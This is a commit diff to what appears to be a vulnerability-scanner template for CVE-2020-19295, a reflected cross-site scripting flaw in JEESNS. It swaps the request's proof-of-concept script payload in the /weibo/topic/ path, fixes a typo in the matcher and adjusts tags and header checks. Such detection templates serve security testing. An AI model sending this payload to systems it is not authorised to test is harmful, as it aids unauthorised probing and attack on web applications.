Update CVE-2020-19295.yaml
parent
1d63ebfe45
commit
92014aa363
|
@ -8,21 +8,19 @@ info:
|
|||
reference:
|
||||
- https://github.com/zchuanzhao/jeesns/issues/21
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-19295
|
||||
tags: cves,cve2020,jeesns,xss
|
||||
tags: cve,cve2020,jeesns,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/weibo/topic/%3CScript%3Eprompt(document.domain)%3C/Script%3E"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
- "{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<script>prompt(document.domain)</scriot>'
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
|
@ -30,6 +28,6 @@ requests:
|
|||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'Content-Type: text/html'
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
|
Loading…
Reference in New Issue